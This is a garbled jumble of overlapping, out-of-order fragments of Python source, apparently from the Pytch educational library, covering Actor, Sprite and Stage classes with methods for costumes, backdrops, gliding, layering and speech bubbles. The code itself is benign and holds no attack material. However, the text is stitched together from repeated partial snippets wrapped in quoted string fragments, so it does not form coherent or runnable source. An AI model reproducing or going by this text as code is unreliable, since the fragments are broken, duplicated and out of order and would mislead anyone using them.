(self._pytch_parent_project .move_within_draw_layer_group(self,", "\" but there are no Costumes\") self._shown = self.start_shown else: self._shown = at_least_one_Costume", "self._appearance_index @property def appearance_name(self): self.ensure_have_appearance_names() return self._appearance_names[self._appearance_index] class Sprite(Actor): Costumes = [ ('question-mark',", "be numbers\") if not _is_number(seconds): raise ValueError(\"'seconds' must be a number\"); if seconds", "target_class): return (self._pytch_parent_project .instance_is_touching_any_of(self, target_class)) def delete_this_clone(self): self._pytch_parent_project.unregister_actor_instance(self) def move_to_front_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\",", "# In contrast to Sprites, a Stage is always shown and so #", "switch to {} number {} in class \"{}\":' ' number can not be", "0 else: # It is not necessarily an error to have no Costumes,", "number {} in class \"{}\":' ' number can not be negative') .format(self._appearance_hyponym, appearance_index,", "y def change_y(self, dy): self._y += dy def glide_to_xy(self, destination_x, destination_y, seconds): destination_is_number", "\"relative\", n_layers)) def move_backward_layers(self, n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\", -n_layers)) def say(self, content): self._speech", "switch_backdrop(self, backdrop_name): self.switch_appearance(backdrop_name) def next_backdrop(self, n_steps=1): self.next_appearance(n_steps) @property def backdrop_number(self): return self.appearance_number @property", "def touching(self, target_class): return (self._pytch_parent_project .instance_is_touching_any_of(self, target_class)) def delete_this_clone(self): self._pytch_parent_project.unregister_actor_instance(self) def move_to_front_layer(self): (self._pytch_parent_project", "have at least one Backdrop. raise ValueError('no Backdrops in Stage') self._appearance_index = 0", "== 0: raise ValueError( ('could not move to next {} in class \"{}\":'", "is set,\" \" but there are no Costumes\") self._shown = self.start_shown else: self._shown", "@classmethod def all_clones(cls): return registered_instances(cls)[1:] @classmethod def all_instances(cls): return registered_instances(cls) def go_to_xy(self, x,", "range(1, n_frames + 1): t = frame_idx / n_frames # t is in", "n_frames (inclusive) rather than 0 up to n_frames - 1. for frame_idx in", "not be negative') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__)) n_appearances = len(self._appearance_names) if appearance_index >= n_appearances:", "n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\", -n_layers)) def say(self, content): self._speech = (\"say\", content) def", "completion, we must be exactly at the target, and we want # the", "self.start_shown and not at_least_one_Costume: raise ValueError(\"start_shown is set,\" \" but there are no", "string or integer') .format(self._appearance_hyponym, self.__class__.__name__)) def next_appearance(self, n_steps): if not isinstance(n_steps, int): raise", "self.__class__.__name__)) n_appearances = len(self._appearance_names) if appearance_index >= n_appearances: raise ValueError( ('could not switch", "x self._y = y def get_x(self): return self._x def set_x(self, x): self._x =", "n_appearances = len(self._appearance_names) if appearance_index >= n_appearances: raise ValueError( ('could not switch to", "start_x y = t * destination_y + t_c * start_y self.go_to_xy(x, y) wait_seconds(0)", "@property def costume_name(self): return self.appearance_name def touching(self, target_class): return (self._pytch_parent_project .instance_is_touching_any_of(self, target_class)) def", "It might, for # example, only receive/broadcast messages or play sounds. self._appearance_index =", ".move_within_draw_layer_group(self, \"absolute\", -1)) def move_to_back_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", 0)) def move_forward_layers(self, n_layers): (self._pytch_parent_project", "has no {0}s') .format(self._appearance_hyponym, self.__class__.__name__) ) self._appearance_index += n_steps self._appearance_index %= len(self._Appearances) @property", "= [] _appearance_names = None def start_sound(self, sound_name): play_sound(self, sound_name, False) def play_sound_until_done(self,", "Backdrops = [('solid-white', 'solid-white-stage.png')] _x = 0 _y = 0 _size = 1.0", "0: raise ValueError( ('could not switch to {} number {} in class \"{}\":'", "y): self._x = x self._y = y def get_x(self): return self._x def set_x(self,", "x = t * destination_x + t_c * start_x y = t *", "the_original(cls): return registered_instances(cls)[0] @classmethod def all_clones(cls): return registered_instances(cls)[1:] @classmethod def all_instances(cls): return registered_instances(cls)", "return (self._pytch_parent_project .instance_is_touching_any_of(self, target_class)) def delete_this_clone(self): self._pytch_parent_project.unregister_actor_instance(self) def move_to_front_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", -1))", "= None at_least_one_Costume = len(self._Appearances) != 0 if hasattr(self, \"start_shown\"): if self.start_shown and", "n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\", n_layers)) def move_backward_layers(self, n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\", -n_layers)) def", "n_frames + 1): t = frame_idx / n_frames # t is in (0.0,", "negative\") n_frames = max(int(seconds * FRAMES_PER_SECOND), 1) start_x = self._x start_y = self._y", "in self._appearance_names: raise KeyError('could not find {} \"{}\" in class \"{}\"' .format(self._appearance_hyponym, appearance_name,", "' number can not be negative') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__)) n_appearances = len(self._appearance_names) if", "with no Costumes') self._shown = True def hide(self): self._shown = False def switch_costume(self,", "move_to_front_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", -1)) def move_to_back_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", 0)) def move_forward_layers(self,", "def change_y(self, dy): self._y += dy def glide_to_xy(self, destination_x, destination_y, seconds): destination_is_number =", "destination_is_number: raise ValueError(\"destination coordinates must be numbers\") if not _is_number(seconds): raise ValueError(\"'seconds' must", "to involve some movement, so count from 1 up # to n_frames (inclusive)", "in __init__(). raise RuntimeError('cannot show a Sprite with no Costumes') self._shown = True", "_appearance_names = None def start_sound(self, sound_name): play_sound(self, sound_name, False) def play_sound_until_done(self, sound_name): play_sound(self,", "0)) def move_forward_layers(self, n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\", n_layers)) def move_backward_layers(self, n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self,", "dy): self._y += dy def glide_to_xy(self, destination_x, destination_y, seconds): destination_is_number = ( _is_number(destination_x)", "self.ensure_have_appearance_names() return self._appearance_names[self._appearance_index] class Sprite(Actor): Costumes = [ ('question-mark', 'question-mark.png', 16, 16), ]", "go_to_xy(self, x, y): self._x = x self._y = y def get_x(self): return self._x", "def all_clones(cls): return registered_instances(cls)[1:] @classmethod def all_instances(cls): return registered_instances(cls) def go_to_xy(self, x, y):", "only receive/broadcast messages or play sounds. self._appearance_index = None @classmethod def the_original(cls): return", "is in (0.0, 1.0] t_c = 1.0 - t # 'complement' x =", "destination_y, seconds): destination_is_number = ( _is_number(destination_x) and _is_number(destination_y) ) if not destination_is_number: raise", "frame_idx / n_frames # t is in (0.0, 1.0] t_c = 1.0 -", "n_steps): if not isinstance(n_steps, int): raise ValueError(\"n_steps must be integer\") if len(self._Appearances) ==", "registered_instances(cls)[0] def switch_backdrop(self, backdrop_name): self.switch_appearance(backdrop_name) def next_backdrop(self, n_steps=1): self.next_appearance(n_steps) @property def backdrop_number(self): return", "\"import pytch\") def set_size(self, size): self._size = size def show(self): if not self.Costumes:", "self.__class__.__name__, n_appearances)) self._appearance_index = appearance_index else: raise ValueError( ('could not switch {} in", "Stage(Actor): Backdrops = [('solid-white', 'solid-white-stage.png')] _x = 0 _y = 0 _size =", "in class \"{}\":' ' argument must be string or integer') .format(self._appearance_hyponym, self.__class__.__name__)) def", "self.__class__.__name__) ) self._appearance_index += n_steps self._appearance_index %= len(self._Appearances) @property def appearance_number(self): return self._appearance_index", "next_backdrop(self, n_steps=1): self.next_appearance(n_steps) @property def backdrop_number(self): return self.appearance_number @property def backdrop_name(self): return self.appearance_name", "appearance_name(self): self.ensure_have_appearance_names() return self._appearance_names[self._appearance_index] class Sprite(Actor): Costumes = [ ('question-mark', 'question-mark.png', 16, 16),", "must be integer\") if len(self._Appearances) == 0: raise ValueError( ('could not move to", "def move_backward_layers(self, n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\", -n_layers)) def say(self, content): self._speech = (\"say\",", "set,\" \" but there are no Costumes\") self._shown = self.start_shown else: self._shown =", "if not self.Backdrops: # In contrast to Sprites, a Stage is always shown", "at_least_one_Costume if at_least_one_Costume: self._appearance_index = 0 else: # It is not necessarily an", "False def switch_costume(self, costume_name): self.switch_appearance(costume_name) def next_costume(self, n_steps=1): self.next_appearance(n_steps) @property def costume_number(self): return", "sound_name): play_sound(self, sound_name, False) def play_sound_until_done(self, sound_name): play_sound(self, sound_name, True) @classmethod def ensure_have_appearance_names(cls):", "an error to have no Costumes, as # long as the Sprite always", "1 up # to n_frames (inclusive) rather than 0 up to n_frames -", "None @classmethod def the_original(cls): return registered_instances(cls)[0] @classmethod def all_clones(cls): return registered_instances(cls)[1:] @classmethod def", "not at_least_one_Costume: raise ValueError(\"start_shown is set,\" \" but there are no Costumes\") self._shown", "= 'Backdrop' def __init__(self): if not self.Backdrops: # In contrast to Sprites, a", "in cls._Appearances ] def switch_appearance(self, appearance_name_or_index): self.ensure_have_appearance_names() if isinstance(appearance_name_or_index, str): appearance_name = appearance_name_or_index", "to n_frames (inclusive) rather than 0 up to n_frames - 1. for frame_idx", "must have at least one Backdrop. raise ValueError('no Backdrops in Stage') self._appearance_index =", "remains hidden. It might, for # example, only receive/broadcast messages or play sounds.", "(inclusive) rather than 0 up to n_frames - 1. for frame_idx in range(1,", "1.0 - t # 'complement' x = t * destination_x + t_c *", "not isinstance(n_steps, int): raise ValueError(\"n_steps must be integer\") if len(self._Appearances) == 0: raise", "start_y = self._y # On completion, we must be exactly at the target,", "= True def hide(self): self._shown = False def switch_costume(self, costume_name): self.switch_appearance(costume_name) def next_costume(self,", "FRAMES_PER_SECOND), 1) start_x = self._x start_y = self._y # On completion, we must", "number\"); if seconds < 0: raise ValueError(\"'seconds' cannot be negative\") n_frames = max(int(seconds", "class \"{}\":' ' it has no {0}s') .format(self._appearance_hyponym, self.__class__.__name__) ) self._appearance_index += n_steps", "auto-yield (we don't do \"import pytch\") def set_size(self, size): self._size = size def", "no {0}s') .format(self._appearance_hyponym, self.__class__.__name__) ) self._appearance_index += n_steps self._appearance_index %= len(self._Appearances) @property def", "hasattr(self, \"start_shown\"): if self.start_shown and not at_least_one_Costume: raise ValueError(\"start_shown is set,\" \" but", "self.__class__.__name__)) def next_appearance(self, n_steps): if not isinstance(n_steps, int): raise ValueError(\"n_steps must be integer\")", "dx def get_y(self): return self._y def set_y(self, y): self._y = y def change_y(self,", "self._x = x def change_x(self, dx): self._x += dx def get_y(self): return self._y", "* start_y self.go_to_xy(x, y) wait_seconds(0) # No auto-yield (we don't do \"import pytch\")", "[] _appearance_names = None def start_sound(self, sound_name): play_sound(self, sound_name, False) def play_sound_until_done(self, sound_name):", "[ appearance.label for appearance in cls._Appearances ] def switch_appearance(self, appearance_name_or_index): self.ensure_have_appearance_names() if isinstance(appearance_name_or_index,", "self.Backdrops: # In contrast to Sprites, a Stage is always shown and so", ".format(self._appearance_hyponym, self.__class__.__name__) ) self._appearance_index += n_steps self._appearance_index %= len(self._Appearances) @property def appearance_number(self): return", "self._x = x self._y = y def get_x(self): return self._x def set_x(self, x):", "import ( play_sound, registered_instances, wait_seconds, ) from pytch.project import FRAMES_PER_SECOND def _is_number(x): return", "+ t_c * start_y self.go_to_xy(x, y) wait_seconds(0) # No auto-yield (we don't do", "no Costumes') self._shown = True def hide(self): self._shown = False def switch_costume(self, costume_name):", "hide(self): self._shown = False def switch_costume(self, costume_name): self.switch_appearance(costume_name) def next_costume(self, n_steps=1): self.next_appearance(n_steps) @property", "-n_layers)) def say(self, content): self._speech = (\"say\", content) def say_nothing(self): self._speech = None", "__init__(self): if not self.Backdrops: # In contrast to Sprites, a Stage is always", "class Sprite(Actor): Costumes = [ ('question-mark', 'question-mark.png', 16, 16), ] _appearance_hyponym = 'Costume'", "do \"import pytch\") def set_size(self, size): self._size = size def show(self): if not", "def __init__(self): self._x = 0 self._y = 0 self._size = 1.0 self._speech =", "must be numbers\") if not _is_number(seconds): raise ValueError(\"'seconds' must be a number\"); if", "if not isinstance(n_steps, int): raise ValueError(\"n_steps must be integer\") if len(self._Appearances) == 0:", "delete_this_clone(self): self._pytch_parent_project.unregister_actor_instance(self) def move_to_front_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", -1)) def move_to_back_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\",", "the_only(cls): return registered_instances(cls)[0] def switch_backdrop(self, backdrop_name): self.switch_appearance(backdrop_name) def next_backdrop(self, n_steps=1): self.next_appearance(n_steps) @property def", "appearance_index else: raise ValueError( ('could not switch {} in class \"{}\":' ' argument", "play sounds. self._appearance_index = None @classmethod def the_original(cls): return registered_instances(cls)[0] @classmethod def all_clones(cls):", "comment in __init__(). raise RuntimeError('cannot show a Sprite with no Costumes') self._shown =", "self._speech = None def say_for_seconds(self, content, seconds): self.say(content) wait_seconds(seconds) self.say_nothing() class Stage(Actor): Backdrops", "+= dy def glide_to_xy(self, destination_x, destination_y, seconds): destination_is_number = ( _is_number(destination_x) and _is_number(destination_y)", "+= dx def get_y(self): return self._y def set_y(self, y): self._y = y def", "show a Sprite with no Costumes') self._shown = True def hide(self): self._shown =", "return isinstance(x, int) or isinstance(x, float) class Actor: Sounds = [] _appearance_names =", "return registered_instances(cls)[1:] @classmethod def all_instances(cls): return registered_instances(cls) def go_to_xy(self, x, y): self._x =", "be a number\"); if seconds < 0: raise ValueError(\"'seconds' cannot be negative\") n_frames", "= None _appearance_hyponym = 'Backdrop' def __init__(self): if not self.Backdrops: # In contrast", "_is_number(destination_y) ) if not destination_is_number: raise ValueError(\"destination coordinates must be numbers\") if not", "or integer') .format(self._appearance_hyponym, self.__class__.__name__)) def next_appearance(self, n_steps): if not isinstance(n_steps, int): raise ValueError(\"n_steps", "In contrast to Sprites, a Stage is always shown and so # must", "ValueError(\"'seconds' cannot be negative\") n_frames = max(int(seconds * FRAMES_PER_SECOND), 1) start_x = self._x", "= 0 _size = 1.0 _shown = True _speech = None _appearance_hyponym =", "play_sound(self, sound_name, True) @classmethod def ensure_have_appearance_names(cls): if cls._appearance_names is None: cls._appearance_names = [", "are no Costumes\") self._shown = self.start_shown else: self._shown = at_least_one_Costume if at_least_one_Costume: self._appearance_index", "target, and we want # the first frame to involve some movement, so", "def go_to_xy(self, x, y): self._x = x self._y = y def get_x(self): return", "is not necessarily an error to have no Costumes, as # long as", "appearance_name_or_index if appearance_name not in self._appearance_names: raise KeyError('could not find {} \"{}\" in", "find {} \"{}\" in class \"{}\"' .format(self._appearance_hyponym, appearance_name, self.__class__.__name__)) self._appearance_index = self._appearance_names.index(appearance_name) elif", "] def switch_appearance(self, appearance_name_or_index): self.ensure_have_appearance_names() if isinstance(appearance_name_or_index, str): appearance_name = appearance_name_or_index if appearance_name", "{} number {} in class \"{}\":' ' it only has {} {0}s') .format(self._appearance_hyponym,", "n_frames # t is in (0.0, 1.0] t_c = 1.0 - t #", "(self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\", n_layers)) def move_backward_layers(self, n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\", -n_layers)) def say(self,", "\"{}\":' ' argument must be string or integer') .format(self._appearance_hyponym, self.__class__.__name__)) def next_appearance(self, n_steps):", "appearance.label for appearance in cls._Appearances ] def switch_appearance(self, appearance_name_or_index): self.ensure_have_appearance_names() if isinstance(appearance_name_or_index, str):", "appearance_index, self.__class__.__name__)) n_appearances = len(self._appearance_names) if appearance_index >= n_appearances: raise ValueError( ('could not", ".format(self._appearance_hyponym, appearance_index, self.__class__.__name__, n_appearances)) self._appearance_index = appearance_index else: raise ValueError( ('could not switch", "= self._x start_y = self._y # On completion, we must be exactly at", "self._speech = (\"say\", content) def say_nothing(self): self._speech = None def say_for_seconds(self, content, seconds):", "int): raise ValueError(\"n_steps must be integer\") if len(self._Appearances) == 0: raise ValueError( ('could", "dy def glide_to_xy(self, destination_x, destination_y, seconds): destination_is_number = ( _is_number(destination_x) and _is_number(destination_y) )", "negative') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__)) n_appearances = len(self._appearance_names) if appearance_index >= n_appearances: raise ValueError(", "raise ValueError(\"start_shown is set,\" \" but there are no Costumes\") self._shown = self.start_shown", "def get_y(self): return self._y def set_y(self, y): self._y = y def change_y(self, dy):", "appearance_name_or_index if appearance_index < 0: raise ValueError( ('could not switch to {} number", "return registered_instances(cls)[0] def switch_backdrop(self, backdrop_name): self.switch_appearance(backdrop_name) def next_backdrop(self, n_steps=1): self.next_appearance(n_steps) @property def backdrop_number(self):", "if not _is_number(seconds): raise ValueError(\"'seconds' must be a number\"); if seconds < 0:", "the Sprite always remains hidden. It might, for # example, only receive/broadcast messages", "receive/broadcast messages or play sounds. self._appearance_index = None @classmethod def the_original(cls): return registered_instances(cls)[0]", "0 self._y = 0 self._size = 1.0 self._speech = None at_least_one_Costume = len(self._Appearances)", "so # must have at least one Backdrop. raise ValueError('no Backdrops in Stage')", "x, y): self._x = x self._y = y def get_x(self): return self._x def", "if isinstance(appearance_name_or_index, str): appearance_name = appearance_name_or_index if appearance_name not in self._appearance_names: raise KeyError('could", "= appearance_name_or_index if appearance_index < 0: raise ValueError( ('could not switch to {}", "- t # 'complement' x = t * destination_x + t_c * start_x", "no Costumes, as # long as the Sprite always remains hidden. It might,", "self._x def set_x(self, x): self._x = x def change_x(self, dx): self._x += dx", "self._y += dy def glide_to_xy(self, destination_x, destination_y, seconds): destination_is_number = ( _is_number(destination_x) and", "None def start_sound(self, sound_name): play_sound(self, sound_name, False) def play_sound_until_done(self, sound_name): play_sound(self, sound_name, True)", "def costume_name(self): return self.appearance_name def touching(self, target_class): return (self._pytch_parent_project .instance_is_touching_any_of(self, target_class)) def delete_this_clone(self):", "return self._appearance_index @property def appearance_name(self): self.ensure_have_appearance_names() return self._appearance_names[self._appearance_index] class Sprite(Actor): Costumes = [", "be integer\") if len(self._Appearances) == 0: raise ValueError( ('could not move to next", "set_x(self, x): self._x = x def change_x(self, dx): self._x += dx def get_y(self):", "0 self._size = 1.0 self._speech = None at_least_one_Costume = len(self._Appearances) != 0 if", "('could not move to next {} in class \"{}\":' ' it has no", "cls._appearance_names = [ appearance.label for appearance in cls._Appearances ] def switch_appearance(self, appearance_name_or_index): self.ensure_have_appearance_names()", ") self._appearance_index += n_steps self._appearance_index %= len(self._Appearances) @property def appearance_number(self): return self._appearance_index @property", "( _is_number(destination_x) and _is_number(destination_y) ) if not destination_is_number: raise ValueError(\"destination coordinates must be", "if appearance_name not in self._appearance_names: raise KeyError('could not find {} \"{}\" in class", "0 @classmethod def the_only(cls): return registered_instances(cls)[0] def switch_backdrop(self, backdrop_name): self.switch_appearance(backdrop_name) def next_backdrop(self, n_steps=1):", "def next_backdrop(self, n_steps=1): self.next_appearance(n_steps) @property def backdrop_number(self): return self.appearance_number @property def backdrop_name(self): return", "def all_instances(cls): return registered_instances(cls) def go_to_xy(self, x, y): self._x = x self._y =", "so count from 1 up # to n_frames (inclusive) rather than 0 up", "+ 1): t = frame_idx / n_frames # t is in (0.0, 1.0]", "not _is_number(seconds): raise ValueError(\"'seconds' must be a number\"); if seconds < 0: raise", "max(int(seconds * FRAMES_PER_SECOND), 1) start_x = self._x start_y = self._y # On completion,", ".move_within_draw_layer_group(self, \"relative\", -n_layers)) def say(self, content): self._speech = (\"say\", content) def say_nothing(self): self._speech", "return self._y def set_y(self, y): self._y = y def change_y(self, dy): self._y +=", "ValueError(\"start_shown is set,\" \" but there are no Costumes\") self._shown = self.start_shown else:", "def appearance_name(self): self.ensure_have_appearance_names() return self._appearance_names[self._appearance_index] class Sprite(Actor): Costumes = [ ('question-mark', 'question-mark.png', 16,", "start_sound(self, sound_name): play_sound(self, sound_name, False) def play_sound_until_done(self, sound_name): play_sound(self, sound_name, True) @classmethod def", "self._appearance_index = 0 @classmethod def the_only(cls): return registered_instances(cls)[0] def switch_backdrop(self, backdrop_name): self.switch_appearance(backdrop_name) def", "class Actor: Sounds = [] _appearance_names = None def start_sound(self, sound_name): play_sound(self, sound_name,", "change_y(self, dy): self._y += dy def glide_to_xy(self, destination_x, destination_y, seconds): destination_is_number = (", "{} {0}s') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__, n_appearances)) self._appearance_index = appearance_index else: raise ValueError( ('could", "@property def appearance_name(self): self.ensure_have_appearance_names() return self._appearance_names[self._appearance_index] class Sprite(Actor): Costumes = [ ('question-mark', 'question-mark.png',", "at_least_one_Costume: self._appearance_index = 0 else: # It is not necessarily an error to", "switch_appearance(self, appearance_name_or_index): self.ensure_have_appearance_names() if isinstance(appearance_name_or_index, str): appearance_name = appearance_name_or_index if appearance_name not in", "not necessarily an error to have no Costumes, as # long as the", "don't do \"import pytch\") def set_size(self, size): self._size = size def show(self): if", "least one Backdrop. raise ValueError('no Backdrops in Stage') self._appearance_index = 0 @classmethod def", "(0.0, 1.0] t_c = 1.0 - t # 'complement' x = t *", "wait_seconds, ) from pytch.project import FRAMES_PER_SECOND def _is_number(x): return isinstance(x, int) or isinstance(x,", "and _is_number(destination_y) ) if not destination_is_number: raise ValueError(\"destination coordinates must be numbers\") if", "seconds): self.say(content) wait_seconds(seconds) self.say_nothing() class Stage(Actor): Backdrops = [('solid-white', 'solid-white-stage.png')] _x = 0", "!= 0 if hasattr(self, \"start_shown\"): if self.start_shown and not at_least_one_Costume: raise ValueError(\"start_shown is", "self.switch_appearance(backdrop_name) def next_backdrop(self, n_steps=1): self.next_appearance(n_steps) @property def backdrop_number(self): return self.appearance_number @property def backdrop_name(self):", "touching(self, target_class): return (self._pytch_parent_project .instance_is_touching_any_of(self, target_class)) def delete_this_clone(self): self._pytch_parent_project.unregister_actor_instance(self) def move_to_front_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self,", "[('solid-white', 'solid-white-stage.png')] _x = 0 _y = 0 _size = 1.0 _shown =", "self._x += dx def get_y(self): return self._y def set_y(self, y): self._y = y", "content, seconds): self.say(content) wait_seconds(seconds) self.say_nothing() class Stage(Actor): Backdrops = [('solid-white', 'solid-white-stage.png')] _x =", "for frame_idx in range(1, n_frames + 1): t = frame_idx / n_frames #", "t * destination_y + t_c * start_y self.go_to_xy(x, y) wait_seconds(0) # No auto-yield", "isinstance(x, int) or isinstance(x, float) class Actor: Sounds = [] _appearance_names = None", "play_sound, registered_instances, wait_seconds, ) from pytch.project import FRAMES_PER_SECOND def _is_number(x): return isinstance(x, int)", "self._shown = at_least_one_Costume if at_least_one_Costume: self._appearance_index = 0 else: # It is not", "FRAMES_PER_SECOND def _is_number(x): return isinstance(x, int) or isinstance(x, float) class Actor: Sounds =", "if len(self._Appearances) == 0: raise ValueError( ('could not move to next {} in", "def __init__(self): if not self.Backdrops: # In contrast to Sprites, a Stage is", "in class \"{}\":' ' it has no {0}s') .format(self._appearance_hyponym, self.__class__.__name__) ) self._appearance_index +=", "self.next_appearance(n_steps) @property def costume_number(self): return self.appearance_number @property def costume_name(self): return self.appearance_name def touching(self,", "= self._appearance_names.index(appearance_name) elif isinstance(appearance_name_or_index, int): appearance_index = appearance_name_or_index if appearance_index < 0: raise", "def move_to_back_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", 0)) def move_forward_layers(self, n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\", n_layers))", "ValueError(\"'seconds' must be a number\"); if seconds < 0: raise ValueError(\"'seconds' cannot be", "start_x = self._x start_y = self._y # On completion, we must be exactly", "isinstance(appearance_name_or_index, int): appearance_index = appearance_name_or_index if appearance_index < 0: raise ValueError( ('could not", "0 if hasattr(self, \"start_shown\"): if self.start_shown and not at_least_one_Costume: raise ValueError(\"start_shown is set,\"", "must be a number\"); if seconds < 0: raise ValueError(\"'seconds' cannot be negative\")", "next_costume(self, n_steps=1): self.next_appearance(n_steps) @property def costume_number(self): return self.appearance_number @property def costume_name(self): return self.appearance_name", "\"relative\", -n_layers)) def say(self, content): self._speech = (\"say\", content) def say_nothing(self): self._speech =", "else: raise ValueError( ('could not switch {} in class \"{}\":' ' argument must", "* start_x y = t * destination_y + t_c * start_y self.go_to_xy(x, y)", "be string or integer') .format(self._appearance_hyponym, self.__class__.__name__)) def next_appearance(self, n_steps): if not isinstance(n_steps, int):", "appearance_number(self): return self._appearance_index @property def appearance_name(self): self.ensure_have_appearance_names() return self._appearance_names[self._appearance_index] class Sprite(Actor): Costumes =", "self.__class__.__name__)) self._appearance_index = self._appearance_names.index(appearance_name) elif isinstance(appearance_name_or_index, int): appearance_index = appearance_name_or_index if appearance_index <", "\"absolute\", 0)) def move_forward_layers(self, n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\", n_layers)) def move_backward_layers(self, n_layers): (self._pytch_parent_project", "@classmethod def the_original(cls): return registered_instances(cls)[0] @classmethod def all_clones(cls): return registered_instances(cls)[1:] @classmethod def all_instances(cls):", "count from 1 up # to n_frames (inclusive) rather than 0 up to", "(we don't do \"import pytch\") def set_size(self, size): self._size = size def show(self):", "False) def play_sound_until_done(self, sound_name): play_sound(self, sound_name, True) @classmethod def ensure_have_appearance_names(cls): if cls._appearance_names is", "def set_y(self, y): self._y = y def change_y(self, dy): self._y += dy def", "= len(self._Appearances) != 0 if hasattr(self, \"start_shown\"): if self.start_shown and not at_least_one_Costume: raise", "and so # must have at least one Backdrop. raise ValueError('no Backdrops in", "< 0: raise ValueError( ('could not switch to {} number {} in class", "= y def get_x(self): return self._x def set_x(self, x): self._x = x def", "self._y = y def change_y(self, dy): self._y += dy def glide_to_xy(self, destination_x, destination_y,", "Costumes = [ ('question-mark', 'question-mark.png', 16, 16), ] _appearance_hyponym = 'Costume' def __init__(self):", "else: # It is not necessarily an error to have no Costumes, as", "or play sounds. self._appearance_index = None @classmethod def the_original(cls): return registered_instances(cls)[0] @classmethod def", "elif isinstance(appearance_name_or_index, int): appearance_index = appearance_name_or_index if appearance_index < 0: raise ValueError( ('could", "-1)) def move_to_back_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", 0)) def move_forward_layers(self, n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\",", "self._shown = True def hide(self): self._shown = False def switch_costume(self, costume_name): self.switch_appearance(costume_name) def", "(self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", -1)) def move_to_back_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", 0)) def move_forward_layers(self, n_layers):", "if appearance_index >= n_appearances: raise ValueError( ('could not switch to {} number {}", "at_least_one_Costume: raise ValueError(\"start_shown is set,\" \" but there are no Costumes\") self._shown =", "to {} number {} in class \"{}\":' ' it only has {} {0}s')", "int): appearance_index = appearance_name_or_index if appearance_index < 0: raise ValueError( ('could not switch", "appearance_index >= n_appearances: raise ValueError( ('could not switch to {} number {} in", "Actor: Sounds = [] _appearance_names = None def start_sound(self, sound_name): play_sound(self, sound_name, False)", "switch to {} number {} in class \"{}\":' ' it only has {}", "if hasattr(self, \"start_shown\"): if self.start_shown and not at_least_one_Costume: raise ValueError(\"start_shown is set,\" \"", "def next_costume(self, n_steps=1): self.next_appearance(n_steps) @property def costume_number(self): return self.appearance_number @property def costume_name(self): return", "\"{}\":' ' number can not be negative') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__)) n_appearances = len(self._appearance_names)", "{0}s') .format(self._appearance_hyponym, self.__class__.__name__) ) self._appearance_index += n_steps self._appearance_index %= len(self._Appearances) @property def appearance_number(self):", "have no Costumes, as # long as the Sprite always remains hidden. It", "if not destination_is_number: raise ValueError(\"destination coordinates must be numbers\") if not _is_number(seconds): raise", "] _appearance_hyponym = 'Costume' def __init__(self): self._x = 0 self._y = 0 self._size", "pytch.syscalls import ( play_sound, registered_instances, wait_seconds, ) from pytch.project import FRAMES_PER_SECOND def _is_number(x):", "('could not switch to {} number {} in class \"{}\":' ' it only", "play_sound_until_done(self, sound_name): play_sound(self, sound_name, True) @classmethod def ensure_have_appearance_names(cls): if cls._appearance_names is None: cls._appearance_names", "movement, so count from 1 up # to n_frames (inclusive) rather than 0", "'question-mark.png', 16, 16), ] _appearance_hyponym = 'Costume' def __init__(self): self._x = 0 self._y", "hidden. It might, for # example, only receive/broadcast messages or play sounds. self._appearance_index", "(\"say\", content) def say_nothing(self): self._speech = None def say_for_seconds(self, content, seconds): self.say(content) wait_seconds(seconds)", "def next_appearance(self, n_steps): if not isinstance(n_steps, int): raise ValueError(\"n_steps must be integer\") if", "n_layers)) def move_backward_layers(self, n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\", -n_layers)) def say(self, content): self._speech =", "n_steps self._appearance_index %= len(self._Appearances) @property def appearance_number(self): return self._appearance_index @property def appearance_name(self): self.ensure_have_appearance_names()", "= self.start_shown else: self._shown = at_least_one_Costume if at_least_one_Costume: self._appearance_index = 0 else: #", "appearance_name, self.__class__.__name__)) self._appearance_index = self._appearance_names.index(appearance_name) elif isinstance(appearance_name_or_index, int): appearance_index = appearance_name_or_index if appearance_index", "all_instances(cls): return registered_instances(cls) def go_to_xy(self, x, y): self._x = x self._y = y", "True _speech = None _appearance_hyponym = 'Backdrop' def __init__(self): if not self.Backdrops: #", "raise ValueError( ('could not switch {} in class \"{}\":' ' argument must be", "n_appearances)) self._appearance_index = appearance_index else: raise ValueError( ('could not switch {} in class", "= appearance_index else: raise ValueError( ('could not switch {} in class \"{}\":' '", "Sounds = [] _appearance_names = None def start_sound(self, sound_name): play_sound(self, sound_name, False) def", "self.appearance_number @property def costume_name(self): return self.appearance_name def touching(self, target_class): return (self._pytch_parent_project .instance_is_touching_any_of(self, target_class))", "('could not switch {} in class \"{}\":' ' argument must be string or", "move_forward_layers(self, n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\", n_layers)) def move_backward_layers(self, n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\", -n_layers))", "appearance in cls._Appearances ] def 